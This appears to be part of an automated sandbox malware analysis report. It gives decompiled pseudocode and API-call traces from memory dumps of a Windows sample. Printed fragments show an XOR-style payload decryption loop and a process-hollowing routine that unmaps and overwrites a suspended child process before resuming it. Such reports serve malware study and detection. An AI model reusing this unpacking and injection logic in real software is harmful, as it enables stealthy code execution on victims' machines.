    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}






    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}

    Strings
    Memory Dump Source
    • Source File: 00000012.00000002.1543762025.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0018E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0018E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0018E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0018E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0018E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0018E271
    • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0018E297
    • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 0018E306
    • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0018E32C
    • SetThreadContext.KERNEL32(00000000,?), ref: 0018E34E
    • ResumeThread.KERNELBASE(00000000), ref: 0018E35A
    Memory Dump Source
    • Source File: 00000013.00000002.1554284814.0018D000.00000040.sdmp, Offset: 0018D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_18d000_obtG43AWHP.jbxd
    APIs
    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0018E493
    • PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0018E4B6
      • Part of subcall function 0018E080: VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0018E0C6
      • Part of subcall function 0018E080: GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0018E0DC
      • Part of subcall function 0018E080: CreateProcessA.KERNEL32(?,00000000), ref: 0018E1C2
      • Part of subcall function 0018E080: VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0018E1F0
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1554284814.0018D000.00000040.sdmp, Offset: 0018D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_18d000_obtG43AWHP.jbxd
    APIs
    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 0018E54C
      • Part of subcall function 0018E380: CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 0018E493
      • Part of subcall function 0018E380: PostMessageA.USER32(00000000,00000400,00000064,000001F4), ref: 0018E4B6
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1554284814.0018D000.00000040.sdmp, Offset: 0018D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_18d000_obtG43AWHP.jbxd

    Non-executed Functions

    Memory Dump Source
    • Source File: 00000013.00000002.1554284814.0018D000.00000040.sdmp, Offset: 0018D000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_18d000_obtG43AWHP.jbxd

    Executed Functions

    C-Code - Quality: 65%
    			E00404FC0(intOrPtr __eax) {
    				intOrPtr _v8;
    				void* _v12;
    				char _v15;
    				char _v17;
    				char _v18;
    				char _v22;
    				int _v28;
    				char _v289;
    				long _t44;
    				long _t61;
    				long _t63;
    				CHAR* _t70;
    				CHAR* _t72;
    				struct HINSTANCE__* _t78;
    				struct HINSTANCE__* _t84;
    				char* _t94;
    				void* _t95;
    				intOrPtr _t99;
    				struct HINSTANCE__* _t107;
    				void* _t110;
    				void* _t112;
    				intOrPtr _t113;
    
    				_t110 = _t112;
    				_t113 = _t112 + 0xfffffee0;
    				_v8 = __eax;
    				GetModuleFileNameA(0,  &_v289, 0x105);
    				_v22 = 0;
    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    				if(_t44 == 0) {
    					L3:
    					_push(_t110);
    					_push(0x4050c5);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t113;
    					_v28 = 5;
    					E00404E08( &_v289, 0x105);
    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E0040522C, 0, 0,  &_v22,  &_v28) != 0) {
    						_v22 = 0;
    					}
    					_v18 = 0;
    					_pop(_t99);
    					 *[fs:eax] = _t99;
    					_push(E004050CC);
    					return RegCloseKey(_v12);
    				} else {
    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
    					if(_t61 == 0) {
    						goto L3;
    					} else {
    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
    						if(_t63 != 0) {
    							_push(0x105);
    							_push(_v8);
    							_push( &_v289);
    							L00401248();
    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
    							_t107 = 0;
    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
    								_t70 =  &_v289;
    								_push(_t70);
    								L00401250();
    								_t94 = _t70 +  &_v289;
    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
    									_t94 = _t94 - 1;
    								}
    								_t72 =  &_v289;
    								if(_t94 != _t72) {
    									_t95 = _t94 + 1;
    									if(_v22 != 0) {
    										_push(0x105 - _t95 - _t72);
    										_push( &_v22);
    										_push(_t95);
    										L00401248();
    										_t107 = LoadLibraryExA( &_v289, 0, 2);
    									}
    									if(_t107 == 0 && _v17 != 0) {
    										_push(0x105 - _t95 -  &_v289);
    										_push( &_v17);
    										_push(_t95);
    										L00401248();
    										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
    										_t107 = _t78;
    										if(_t107 == 0) {
    											_v15 = 0;
    											_push(0x105 - _t95 -  &_v289);
    											_push( &_v17);
    											_push(_t95);
    											L00401248();
    											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
    											_t107 = _t84;
    										}
    									}
    								}
    							}
    							return _t107;
    						} else {
    							goto L3;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0000000B,00000000), ref: 00404FDC
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00404FFA
    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0000000B,00000000), ref: 00405018
    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405036
      • Part of subcall function 00404E08: GetModuleHandleA.KERNEL32(kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00404E25
      • Part of subcall function 00404E08: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00404E36
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00404E66
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00404ECA
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5,?,80000001), ref: 00404EFF
      • Part of subcall function 00404E08: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000,004050C5), ref: 00404F12
      • Part of subcall function 00404E08: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068,00000000), ref: 00404F1F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B,00000000,?,00405068), ref: 00404F2B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8,0000000B), ref: 00404F5F
      • Part of subcall function 00404E08: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,004067D8), ref: 00404F6B
      • Part of subcall function 00404E08: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00404F8D
    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0040507F
    • RegQueryValueExA.ADVAPI32(?,0040522C,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,004050C5,?,80000001), ref: 0040509D
    • RegCloseKey.ADVAPI32(?,004050CC,00000000,?,?,00000000,004050C5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 004050BF
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
